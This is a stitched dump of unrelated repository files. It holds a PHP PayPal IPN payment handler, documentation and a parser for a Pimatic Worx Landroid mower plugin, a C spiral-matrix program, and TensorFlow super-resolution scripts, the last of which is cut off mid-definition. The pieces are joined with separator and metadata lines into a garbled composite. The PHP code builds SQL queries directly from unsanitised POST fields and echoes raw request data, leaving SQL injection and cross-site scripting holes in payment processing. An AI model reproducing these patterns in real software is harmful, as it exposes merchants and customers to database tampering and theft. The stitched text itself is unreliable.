include $_SERVER["DOCUMENT_ROOT"].'/classes/db.php';
$database = new database();
$database->connect();
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('','$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id',1)";
mysql_query($query);
$query = "UPDATE `retail_orders` SET `first_name` = '$first_name',`last_name` = '$last_name',`address_1` = '$address',`city` = '$city',`state` = '$state',`zip` = '$zip' WHERE `id` = '$order_id'";
$result = mysql_query($query);
$query = "SELECT * FROM `retail_orders` WHERE `id` = '$order_id'";
$result = mysql_query($query);
$order_total = mysql_result($result,0,'total');
if ($payment_amount == $order_total){
$query = "UPDATE `retail_orders` SET `payment` = 1 WHERE `id` = '$order_id'";
$result = mysql_query($query);
// IPN message values depend upon the type of notification sent.
// To loop through the &_POST array and print the NV pairs to the screen:
foreach($_POST as $key => $value) {
echo $key." = ". $value."<br>";
}
}
}
} else if (strcmp ($res, "INVALID") == 0) {
// IPN invalid, log for manual investigation
echo "The response from IPN was: <b>" .$res ."</b>";
}
?><file_sep>/ipn_old.php
<?php
include $_SERVER["DOCUMENT_ROOT"].'/classes/db.php';
$database = new database();
$database->connect();
$paypalEmail = "<EMAIL>";
$paypalURL = "https://ipnpb.sandbox.paypal.com/cgi-bin/webscr";
$raw_post_data = file_get_contents('php://input');
$raw_post_array = explode('&', $raw_post_data);
$myPost = array();
foreach ($raw_post_array as $keyval) {
$keyval = explode('=', $keyval);
if (count($keyval) == 2) {
$myPost[$keyval[0]] = urldecode($keyval[1]);
}
}
//здесь мы можем уже сохранить данные в бд и потом проверить правильность 'txn_id'
$req = 'cmd=_notify-validate';
if (function_exists('get_magic_quotes_gpc')) {
$get_magic_quotes_exists = true;
}
foreach ($myPost as $key => $value) {
if ($get_magic_quotes_exists == true && get_magic_quotes_gpc() == 1) {
$value = urlencode(stripslashes($value));
}else {
$value = urlencode($value);
}
$req .= "&$key=$value";
}
$ch = curl_init($paypalURL);
if ($ch == FALSE) {
return FALSE;
}
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $req);
curl_setopt($ch, CURLOPT_SSLVERSION, 6);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_FORBID_REUSE, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: PHP-IPN-Verification-Script',
'Connection: Close',
));
$res = curl_exec($ch);
if ( ! ($res)) {
$errno = curl_errno($ch);
$errstr = curl_error($ch);
curl_close($ch);
throw new Exception("cURL error: [$errno] $errstr");
}
$info = curl_getinfo($ch);
$http_code = $info['http_code'];
if ($http_code != 200) {
throw new Exception("PayPal responded with http code $http_code");
}
curl_close($ch);
$tokens = explode("\r\n\r\n", trim($res));
$res = trim(end($tokens));
if (strcmp($res, "VERIFIED") == 0 || strcasecmp($res, "VERIFIED") == 0){
// Payment data
$item_number = $_POST['item_number'];
$txn_id = $_POST['txn_id'];
$payment_gross = $_POST['mc_gross'];
$currency_code = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
// если мы сохранили данные в бд то тут нужно проверить валидность TXN ID.
// Check if payment data exists with the same TXN ID.
// $valid_txnid = check_txnid($txn_id);
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$date = date('Y-m-d H:i:s');
//$full_ipn = json_encode($myPost);
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id')";
mysql_query($query) or die ($query);
}
$query = "SELECT * FROM `retail_orders` WHERE `id` = '$order_id'";
$result = mysql_query($query);
$order_total = mysql_result($result,0,'total');
if ($payment_amount == $order_total){
$query = "UPDATE `retail_orders` SET `payment` = 1 WHERE `id` = '$order_id'";
$result = mysql_query($query) or die ($query);
if ($result){
// дальше изменяем группу пользователя в upgraded в бд
// но конечно нужно проверить сначала если есть такои пользователь и может изменить больше данных
// тут должны присылать письмо пользователю что все в порядке и админу тоже
}else{
// сообщаем админу
// Error inserting into DB
// E-mail admin or alert user
}
}else{
// сообщаем админу
}
}else{
// сообщаем админу
}
$txn_id = $_POST['txn_id'];
$order_number = $_POST['item_name'];
$payment_amount = $_POST['mc_gross'];
$payment_currency = $_POST['mc_currency'];
$payment_status = $_POST['payment_status'];
$receiver_email = $_POST['receiver_email'];
$payer_email = $_POST['payer_email'];
$order_id = $_POST['custom'];
$date = date('Y-m-d H:i:s');
//$full_ipn = json_encode($myPost);
$query = "SELECT * FROM `transactions` WHERE `txn_id` = '$txn_id'";
$result = mysql_query($query);
if (mysql_num_rows($result) == 0){
$query = "INSERT INTO `transactions` VALUES ('$txn_id','$payment_amount','$payment_currency','$date','$payment_status','$receiver_email','$payer_email','$order_id')";
mysql_query($query) or die ($query);
}
?> | db95e849469929e621cb6dcd0800b1a47fe86bb4 | [
"Markdown",
"PHP"
] | 4 | Markdown | icerock/paypal_form_and_ipn | bacb79beefb992cb730a7ec8d77282a05875e137 | f77e75199ea2aaccd793d267cbd5f87a8dfa87b0 |
refs/heads/master | <file_sep># Release History
* 20200325, v0.1.1
* initial release
* 20200326, v0.1.2
* added rule action string check
* 20200326, v0.1.3
* update package.json
* 20200326, v0.1.4
* fix schedule string
* 20200326, v0.1.8
* added next scheduled mowing
* 20200326, v0.1.11
* added display type attributes
* 20200326, v0.1.12
* update on/off line status
* 20200326, v0.1.13
* added nextMowe acronym
* 20200326, v0.1.14
* fix scheduler
* 20200326, v0.1.15
* edit nextMowe
* 20200328, v0.1.16
* check on double schedule day
* 20200328, v0.1.17
* update uuid lib
* 20200328, v0.1.18
* update logging info
* 20200404, v0.1.19
* reconnect timer to 1 hour
* 20200405, v0.1.20
* schedule fix for today
* 20200410, v0.1.21
* improve onlinecheck error handling
* 20200415, v0.1.22
* improve cloud status handling
* 20210507, v0.1.23
* change api calls to https<file_sep># pimatic-landroid
Pimatic plugin for Worx Landroid mower
This plugin lets you control and get status info from a Landroid mower. Supported mowers are mowers that can be controlled via the Landroid app and are wifi connected to the Worx cloud.
This plugin is tested with a Landroid M500 and should work will all cloud connected Landroid mowers.
After downloading the Landoid app, you can register in the app with your email and password.
After registration you can add your mower in the app, configure the wifi and other settings.
When these steps are done you can configure the pimatic-landoid plugin.
## Config of the plugin
```
{
email: "The email address for your Landroid account"
password: "<PASSWORD>"
debug: "Debug mode. Writes debug messages to the Pimatic log, if set to true."
}
```
## Config of a LandroidMower device
Mowers are added via the discovery function. Per mower a LandroidMower is discovered unless the device is already in the config.
The automatic generated Id must not change. Its the unique reference to your mower. You can change the Pimatic device name after you have saved the device. This is the only device variable you may change!
The following data is automatically generated on device discovery and should not be changed!
```
{
serial: "Serialnumber of the mower"
mac: "Mac address of the mower"
landroid_id: "Landroid ID number of the mower"
command_in: "Mqtt command-in string"
command_out: "Mqtt command-out string"
}
```
The following variables (attributes) are available in the gui / pimatic.
```
cloud: "If plugin is connected or disconnected to the Worx-landroid cloud"
status: "Actual status of the mower (idle, mowing, etc)"
mower: "Mower offline or online"
rainDelay: "Delay after rain, before mowing (minutes)"
totalTime: "TotalTime the mower has mowed (minutes)"
totalDistance: "TotalDistance the mower has mowed (meters)"
totalBladeTime: "TotalBladeTime the mower has mowed (minutes)"
battery: "Battery level (0-100%)"
batteryCharging: "If true battery is charging"
batteryTemperature: "Battery temperature of mower"
wifi: "Wifi strenght at the mower (dBm)"
```
The mower can be controller and configured via rules.
The action syntax is:
```
mower <mower-id>
[start|pause|stop]
[raindelay] <raindelay-number>
[schedule] $schedule-variable | "schedule string"
```
The schedule can be set for a week starting at sunday till saturday. This schedule is repeated every week.
The $schedule-variable contains a string with one or more days, separated by a semi-colon (;)
The format for one day is:
```
<day-of-week>, <time-string>, <duration>, <edgeCut>
valid values:
<day-of-week>: [sunday|monday|tuesday|wednesday|thursday|friday|saturday]
<time-string>: 00:00 - 23:59
<duration>: 0 - 1439 (minutes)
<edgeCut>: 0 or 1
```
for example if you want to set the mower for tuesday and friday at 10:00 for 1 hour with edgeCutting,
the command is:
```
mower <mower-id> schedule $schedule-variable
$schedule-variable = tuesday, 10:00, 60, 1; friday, 10:00, 60, 1
```
or directly with a string in the action part of a rule
```
mower <mower-id> schedule "tuesday, 10:00, 60, 1; friday, 10:00, 60, 1"
```
---
The plugin is partly based on ioBroker.worx and homebridge-landroid
You could backup Pimatic before you are using this plugin!
__The minimum requirement for this plugin is node v8!__
<file_sep>"use strict";
const moment = require("moment");
function LandroidDataset(readings){
if(readings != null && readings != undefined)
this.parse(readings);
}
LandroidDataset.prototype.parse = function(readings) {
if (readings["cfg"]) {
this.language = readings["cfg"]["lg"];
this.dateTime = moment(readings["cfg"]["dt"] + " " + readings["cfg"]["tm"], "DD/MM/YYYY HH:mm:ss");
this.rainDelay = parseInt(readings["cfg"]["rd"], 10);
this.serialNumber = readings["cfg"]["sn"];
if (readings["cfg"]["sc"]) {
this.active = (readings["cfg"]["sc"]["m"] ? true : false);
this.timeExtension = Number(readings["cfg"]["sc"]["p"]).valueOf();
if (readings["cfg"]["sc"]["d"]) {
this.schedule = readings["cfg"]["sc"]["d"];
let entries = readings["cfg"]["sc"]["d"];
entries.forEach(entry => {
/*let timePeriod = new TimePeriod();
let start = String(entry[0]).split(":");
timePeriod.startHour = parseInt(start[0], 10);
timePeriod.startMinute = parseInt(start[1], 10);
timePeriod.durationMinutes = parseInt(entry[1], 10);
timePeriod.cutEdge = (entry[2] ? true : false);
this.schedule.push(timePeriod);*/
});
}
}
}
if (readings["dat"]) {
if (readings["dat"]["st"]) {
this.totalTime = Number(readings["dat"]["st"]["wt"]).valueOf();
this.totalDistance = Number(readings["dat"]["st"]["d"]).valueOf();
this.totalBladeTime = Number(readings["dat"]["st"]["b"]).valueOf();
}
if (readings["dat"]["bt"]) {
this.batteryChargeCycle = Number(readings["dat"]["bt"]["nr"]).valueOf();
this.batteryCharging = (readings["dat"]["bt"]["c"] ? true : false);
this.batteryVoltage = Number(readings["dat"]["bt"]["v"]).valueOf();
this.batteryTemperature = Number(readings["dat"]["bt"]["t"]).valueOf();
this.batteryLevel = Number(readings["dat"]["bt"]["p"]).valueOf();
}
this.macAddress = readings["dat"]["mac"];
this.firmware = readings["dat"]["fw"];
this.wifiQuality = Number(readings["dat"]["rsi"]).valueOf();
this.statusCode = Number(readings["dat"]["ls"]).valueOf();
this.statusDescription = LandroidDataset.STATUS_CODES[this.statusCode];
this.errorCode = Number(readings["dat"]["le"]).valueOf();
this.errorDescription = LandroidDataset.ERROR_CODES[this.errorCode];
}
}
LandroidDataset.STATUS_CODES = {
0: 'IDLE',
1: 'Home',
2: 'Start sequence',
3: 'Leaving home',
4: 'Follow wire',
5: 'Searching home',
6: 'Searching wire',
7: 'Mowing',
8: 'Lifted',
9: 'Trapped',
10: 'Blade blocked',
11: 'Debug',
12: 'Remote control',
30: 'Going home',
31: 'Zone training',
32: 'Border Cut',
33: 'Searching zone',
34: 'Pause'
};
LandroidDataset.ERROR_CODES = {
0: 'No error',
1: 'Trapped',
2: 'Lifted',
3: 'Wire missing',
4: 'Outside wire',
5: 'Raining',
6: 'Close door to mow',
7: 'Close door to go home',
8: 'Blade motor blocked',
9: 'Wheel motor blocked',
10: 'Trapped timeout',
11: 'Upside down',
12: 'Battery low',
13: 'Reverse wire',
14: 'Charge error',
15: 'Timeout finding home',
16: 'Mower locked',
17: 'Battery over temperature',
};
module.exports = LandroidDataset;
| 47a185adb59161241967e3325f16f7c0afccecc9 | [
"Markdown",
"JavaScript"
] | 3 | Markdown | bertreb/pimatic-landroid | 9e9ba13e0371a0f08cf90d54bef59a32ad744655 | c4b01e7b55319a4e1f3ce1215044dc6c4420fbdf |
refs/heads/master | <file_sep>#include<stdio.h>
void printList(int n,int arr[][n]){
printf("\n");
for(int i=0;i<n;++i){
for(int j=0;j<n;++j)
{
printf("%d\t",arr[i][j]);
}
printf("\n");
}
printf("\n");
}
int main(){
int n;
printf("Spiral matris boyutunu giriniz:");
scanf("%d",&n);
int arr[n][n];
for(int i=0;i<n;++i){ //<3
for(int j=0;j<n;++j)
{
arr[j][i]=0;
}
}
int sayac=1;
int i;
int satır=0;
int sutun=0;
int asagiSol=1;
for(int k=n;k>0;--k){
if(k==n){
for(i=sutun;i<sutun+k;++i){
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i-1;
}
else{
if(asagiSol==1)//asagı ve sola
{ //printf("e:%d ,satır:%d,sutun:%d,k:%d\n",e%2,satır,sutun,k);
for(i=satır+1;i<=satır+k;++i){//asagı
arr[i][sutun]=sayac;
++sayac;
printList(n,arr);
}
satır=i-1;
//printf("e:%d ,satır:%d,sutun:%d\n",e%2,satır,sutun);
for(i=sutun-1;i>=sutun-k;--i){//sola
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i+1;
asagiSol=0;
}
else{//yukarı ve saga
for(i=satır-1;i>=satır-k;--i){//yukarı
arr[i][sutun]=sayac;
++sayac;
printList(n,arr);
}
satır=i+1;
for(i=sutun+1;i<=sutun+k;++i){//sağa
arr[satır][i]=sayac;
++sayac;
printList(n,arr);
}
sutun=i-1;
asagiSol=1;
}
}
}
printf("son hali:\n");
printList(n,arr);
return 0;
} | 59c27b1b34bcf0f52d896acf09052ac140c6a8e0 | [
"C"
] | 1 | C | EmirhanAkturk/Spiral-Matris | 13dfe96ee9d25c162047581caf6c39e268b95fa3 | 3af8bba589d4b3cea278901bc16b299a9f90e785 |
refs/heads/master | <repo_name>sjsong08/SuperResolution<file_sep>/utils.py
import cv2
import numpy as np
import tensorflow as tf
import os
import scipy.ndimage
import scipy.misc
def imread(path, gray=False, mode='YCbCr'):
    """Read the image at `path` and return it as a float array in [0, 1].

    gray -- if True, collapse the image to a single 2-D luminance plane
            (flatten=True); otherwise return it with its channels.
    mode -- color-space mode string forwarded to the reader (default YCbCr).
    """
    # NOTE(review): scipy.misc.imread was deprecated and removed in modern
    # SciPy (>= 1.2); migrating (e.g. to imageio) would add a dependency,
    # so the call is kept as-is.
    # .astype(float): np.float (removed in NumPy 1.24) was only an alias
    # of the builtin float, so this is behaviorally identical.
    if gray:
        return scipy.misc.imread(path, flatten=True, mode=mode).astype(float) / 255.
    return scipy.misc.imread(path, mode=mode).astype(float) / 255.
def imsave(image, path):
    """Write `image` (a float array) to `path` and return the writer's result.

    NOTE(review): scipy.misc.imsave was removed in modern SciPy (>= 1.2);
    kept as-is to avoid a new dependency.
    """
    # The original body had a cv2.imwrite(...) call *after* this return;
    # it was unreachable dead code and has been removed.
    return scipy.misc.imsave(path, image)
def get_patches(image, image_size=32, stride=14, is_save=False, path='images/patches/'):
    """Slide a square `image_size` window over `image` with step `stride`
    and collect the crops.

    Works for 2-D (grayscale) and 3-D (H, W, C) inputs; for 3-D input each
    patch keeps all channels. When `is_save` is True every patch is also
    written to `path` (created on demand) as `<n>.png`, numbered from 1.
    Returns the patches stacked into a single numpy array.
    """
    height, width = image.shape[0], image.shape[1]
    save_dir = os.path.join(os.getcwd(), path)
    patches = []
    for top in range(0, height - image_size, stride):
        for left in range(0, width - image_size, stride):
            crop = image[top:top + image_size, left:left + image_size]
            patches.append(crop)
            if is_save:
                if not os.path.isdir(save_dir):
                    os.makedirs(save_dir)
                cv2.imwrite(save_dir + str(len(patches)) + '.png', crop)
    return np.array(patches)
def imgset_read(path, index, gray=True, is_train=False):
    """Load `<path><i>.png` for every i in `index`, scaled to [0, 1].

    gray     -- if True read flattened YCbCr luminance planes, else RGB.
    is_train -- accepted for interface compatibility but currently unused.
    Returns the images stacked into one numpy array.
    """
    # NOTE(review): scipy.misc.imread was removed in modern SciPy (>= 1.2);
    # kept to avoid introducing a new dependency.
    img_set = []
    if gray:
        for i in index:
            img = scipy.misc.imread(path + str(i) + '.png', flatten=True,
                                    mode='YCbCr').astype(float) / 255.
            img_set.append(img)
    else:
        for i in index:
            # Mode strings are case-sensitive: the original 'rgb' raised a
            # KeyError inside PIL; 'RGB' is the valid spelling.
            img = scipy.misc.imread(path + str(i) + '.png',
                                    mode='RGB').astype(float) / 255.
            img_set.append(img)
    return np.array(img_set)
def imgresize(image, scale=2.):
    """Resize every image in a batch by `scale` using OpenCV bicubic
    interpolation.

    `image` is a batch indexed along axis 0, either 4-D
    (num, height, width, channels) or 3-D (num, height, width).
    Returns a new float array with spatial dims int(dim * scale).

    NOTE(review): in the 4-D branch only channel 0 of the output is ever
    written, and `image[i,:,:]` is passed to cv2.resize with its channel
    axis intact -- this is only consistent for single-channel
    (num, h, w, 1) batches (cv2.resize drops a trailing singleton channel).
    Confirm multi-channel input never reaches this function.
    """
    num_sample = image.shape[0]
    if len(image.shape)==4:
        # Pre-allocate the upscaled batch; channel count is preserved.
        images = np.zeros([image.shape[0], int(image.shape[1]*scale), int(image.shape[2]*scale), image.shape[3]])
        for i in range(num_sample):
            images[i,:,:,0] = cv2.resize(image[i,:,:], None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
        return images
    else:
        images = np.zeros([image.shape[0], int(image.shape[1]*scale), int(image.shape[2]*scale)])
        for i in range(num_sample):
            images[i,:,:] = cv2.resize(image[i,:,:], None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
        return images
def preproc(image, scale=2, gray=True):
    """Upscale `image` by `scale` with cubic-spline interpolation.

    gray -- if True, `image` is a 2-D plane zoomed in both axes; otherwise
            `image` is (H, W, 3) and each channel is zoomed independently,
            then re-stacked along axis 2.
    Returns the upscaled array.
    """
    # scipy.ndimage.zoom is the public location of this function; the
    # scipy.ndimage.interpolation namespace used originally is deprecated
    # and removed in recent SciPy. Behavior is identical.
    if gray:
        return scipy.ndimage.zoom(image, (scale / 1.), prefilter=False)
    # Zoom the Y, Cb, Cr planes separately so the channel axis is untouched.
    planes = [scipy.ndimage.zoom(image[:, :, ch], (scale / 1.), prefilter=False)
              for ch in range(3)]
    return np.stack(planes, axis=2)
def bicubic_upsize(image, scale=2):
    """Upscale a single image or a batch of images by `scale` using
    cubic-spline interpolation; the channel axis is left unchanged.

    image -- 4-D (num, H, W, C) batch, zoomed per sample, or a single
             3-D (H, W, C) image.
    Returns the upscaled array.
    """
    # scipy.ndimage.zoom is the public API; the original
    # scipy.ndimage.interpolation namespace is deprecated/removed in
    # recent SciPy. Behavior is identical.
    if len(image.shape) == 4:
        bicImg = np.zeros([image.shape[0], image.shape[1]*scale,
                           image.shape[2]*scale, image.shape[3]])
        for i in range(image.shape[0]):
            # Zoom factor 1 on the channel axis keeps channels intact.
            bicImg[i, :, :, :] = scipy.ndimage.zoom(image[i, :, :, :],
                                                    [scale, scale, 1],
                                                    prefilter=False)
    else:
        bicImg = scipy.ndimage.zoom(image, [scale, scale, 1], prefilter=False)
    return bicImg
def _phase_shift(I, r):
    """Sub-pixel "phase shift": rearrange a (batch, a, b, r*r) feature-map
    group into one upscaled map (batch, a*r, b*r, 1).

    Helper for PS(); this is the periodic-shuffling operation commonly
    known from the ESPCN sub-pixel convolution layer.
    """
    bsize, a, b, c = I.get_shape().as_list()
    X = tf.reshape(I, (-1, a, b, r, r))
    X = tf.transpose(X, (0, 1, 2, 4, 3)) # bsize, a, b, r, r (last two axes swapped)
    # NOTE(review): tf.squeeze below drops *every* size-1 dimension, so this
    # rearrangement silently misbehaves when bsize == 1 (or a == 1 / b == 1)
    # -- confirm batch size > 1 at all call sites.
    X = tf.split(X, a, 1, name='split1') # a, [bsize, b, r, r]
    X = tf.concat([tf.squeeze(x) for x in X], axis=2) # bsize, b, a*r, r
    X = tf.split(X, b, 1, name='split2') # b, [bsize, a*r, r]
    X = tf.concat([tf.squeeze(x) for x in X], axis=2) # bsize, a*r, b*r
    return tf.reshape(X, (-1, a*r, b*r, 1))
def PS(X, r, color=False):
    """Periodic shuffling (sub-pixel upscaling) of `X` by factor `r`.

    color=False: `X` carries r*r channels that are shuffled into a single
    channel at r-times spatial resolution.
    color=True: `X` carries 3*r*r channels; they are split into three r*r
    groups, each shuffled independently, then re-stacked as 3 channels.
    """
    # Main OP that you can arbitrarily use in your tensorflow code
    if color:
        Xc = tf.split(X,3,3) # three equal groups along the channel axis
        X = tf.concat([_phase_shift(x, r) for x in Xc], axis=3)
    else:
        X = _phase_shift(X, r)
    return X
def squash(s, axis=-1, epsilon=1e-7, name=None):
    # Capsule-network squashing nonlinearity: rescales vectors along
    # `axis` to a length in [0, 1) while preserving their direction.
    with tf.name_scope(name, default_name="squash"):
        squared_norm = tf.reduce_sum(tf.square(s), axis=axis, keep_dims=True)
        # epsilon keeps the norm strictly positive so the division below
        # is safe (and the gradient finite) for zero vectors.
        safe_norm = tf.sqrt(squared_norm + epsilon)
        squash_factor = squared_norm / (1. + squared_norm)
        unit_vector = s / safe_norm
        return squash_factor * unit_vector
def safe_norm(s, axis=-1, epsilon=1e-7, keep_dims=False, name=None):
    # Euclidean norm of `s` along `axis`; epsilon keeps sqrt's argument
    # strictly positive so the gradient is finite at zero vectors.
    with tf.name_scope(name, default_name="safe_norm"):
        squared_norm = tf.reduce_sum(tf.square(s), axis=axis,
                                     keep_dims=keep_dims)
        return tf.sqrt(squared_norm + epsilon)<file_sep>/VDSR-v1.py
import numpy as np
import tensorflow as tf
import os
#import imageio
import scipy.ndimage
import scipy.misc
#import matplotlib.pyplot as plt
# Pin CUDA device enumeration to PCI bus order and expose only GPU 1.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="1"
# Working resolution: one tenth of full HD. Fix: use integer division so
# the dimensions stay ints under Python 3 (1920/10 is a float there and
# breaks np.zeros / placeholder shapes).
image_x = 1920 // 10
image_y = 1080 // 10
def imread(path, index, scale=1, gray=True, is_train=False):
    """Load a batch of PNG frames by id.

    Training files are named '<id>x<scale>.png' (low-res, upscaled here via
    preproc); evaluation files are '<id>.png'. Portrait frames are
    transposed to landscape. Values are scaled to [0, 1].

    NOTE(review): scipy.misc.imread was removed in SciPy 1.2 -- this module
    requires an older SciPy (or a port to imageio).
    """
    if gray:
        image = np.zeros([len(index), image_y, image_x, 1])
        cnt = 0
        for i in (index):
            if is_train:
                # flatten=True collapses the image to a single luminance channel.
                img = scipy.misc.imread(path + str(i).zfill(4) + 'x' + str(scale) + '.png', flatten=True,
                                        mode='YCbCr').astype(np.float) / 255.
            else:
                img = scipy.misc.imread(path + str(i).zfill(4) + '.png', flatten=True, mode='YCbCr').astype(
                    np.float) / 255.
            if img.shape[1] < img.shape[0]:
                # Force landscape orientation.
                img = img.T
            # Only frames that pass the minimum-height filter fill a slot.
            if is_train and img.shape[0] >= 540:
                image[cnt, :, :, 0] = preproc(img[:int(image_y / scale), :int(image_x / scale)], scale)
                cnt += 1
            elif is_train == False and img.shape[0] >= 1080:
                image[cnt, :, :, 0] = img[:int(image_y / scale), :int(image_x / scale)]
                cnt += 1
        # Return only the filled slots.
        return image[:cnt, :, :, :]
    else:
        image = np.zeros([len(index), image_y, image_x, 3])
        cnt = 0
        for i in (index):
            if is_train:
                img = scipy.misc.imread(path + str(i).zfill(4) + 'x' + str(scale) + '.png', mode='YCbCr').astype(
                    np.float) / 255.
            else:
                img = scipy.misc.imread(path + str(i).zfill(4) + '.png', mode='YCbCr').astype(np.float) / 255.
            if img.shape[1] < img.shape[0]:
                # Transpose each channel to force landscape orientation.
                img1 = img[:, :, 0].T
                img2 = img[:, :, 1].T
                img3 = img[:, :, 2].T
                img = np.stack([img1, img2, img3], axis=2)
            if is_train:
                # NOTE(review): preproc defaults to gray=True although img
                # has 3 channels here -- verify gray=False was intended.
                image[cnt, :, :, :] = preproc(img[:int(image_y / scale), :int(image_x / scale), :], scale)
            else:
                image[cnt, :, :, :] = img[:int(image_y / scale), :int(image_x / scale), :]
            cnt += 1
        # NOTE(review): unlike the gray branch, no size filter is applied
        # and the full buffer (not image[:cnt]) is returned.
        return image
def preproc(image, scale=2, gray=True):
    """Upsample an image by `scale` with spline interpolation (no prefilter).

    Args:
        image: 2-D array when `gray` is True, else an H x W x 3 array.
        scale: upscaling factor applied to both spatial axes.
        gray: whether `image` is single-channel.

    Returns:
        The zoomed image; color channels are zoomed independently.
    """
    # Fix: scipy.ndimage.interpolation.zoom was removed in SciPy 1.10;
    # scipy.ndimage.zoom is the supported equivalent.
    if gray:
        return scipy.ndimage.zoom(image, (scale / 1.), prefilter=False)
    else:
        channels = [scipy.ndimage.zoom(image[:, :, c], (scale / 1.), prefilter=False)
                    for c in range(3)]
        return np.stack(channels, axis=2)
def imsave(image, path):
    # Thin wrapper: write `image` to `path` as an image file.
    # NOTE(review): scipy.misc.imsave was removed in SciPy 1.2 -- this
    # requires an older SciPy (or porting to imageio.imwrite).
    return scipy.misc.imsave(path, image)
tf.reset_default_graph()
device = "/device:GPU:0"
gray = True           # train on the luminance channel only
epoch_size = 1000
batch_size = 5
# Fix: integer division -- total_iter feeds range(), which rejects the
# float that 800 / batch_size produces under Python 3.
total_iter = 800 // batch_size
# Channel count follows the colour mode.
if gray:
    c_dim = 1
else:
    c_dim = 3
learning_rate = 1e-3
with tf.device(device):
    # Input (bicubic-upscaled LR) and target (HR) batches, NHWC layout.
    X = tf.placeholder(tf.float32, [None, image_y, image_x, c_dim], name='input')
    Y = tf.placeholder(tf.float32, [None, image_y, image_x, c_dim], name='output')
    # 17 conv layers of 3x3 kernels: 1->64, fifteen 64->64, then 64->1.
    weights = {
        'w1': tf.get_variable('w1', shape=[3, 3, 1, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w2': tf.get_variable('w2', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w3': tf.get_variable('w3', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w4': tf.get_variable('w4', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w5': tf.get_variable('w5', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w6': tf.get_variable('w6', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w7': tf.get_variable('w7', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w8': tf.get_variable('w8', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w9': tf.get_variable('w9', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w10': tf.get_variable('w10', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w11': tf.get_variable('w11', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w12': tf.get_variable('w12', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w13': tf.get_variable('w13', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w14': tf.get_variable('w14', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w15': tf.get_variable('w15', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w16': tf.get_variable('w16', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'w17': tf.get_variable('w17', shape=[3, 3, 64, 1], initializer=tf.contrib.layers.xavier_initializer_conv2d())
    }
    # NOTE(review): biases use a conv2d Xavier initializer, which is
    # unusual (zeros is the norm for biases) -- confirm this is intended.
    biases = {
        'b1': tf.get_variable('b1', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b2': tf.get_variable('b2', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b3': tf.get_variable('b3', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b4': tf.get_variable('b4', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b5': tf.get_variable('b5', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b6': tf.get_variable('b6', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b7': tf.get_variable('b7', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b8': tf.get_variable('b8', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b9': tf.get_variable('b9', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b10': tf.get_variable('b10', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b11': tf.get_variable('b11', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b12': tf.get_variable('b12', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b13': tf.get_variable('b13', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
        'b14': tf.get_variable('b14', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
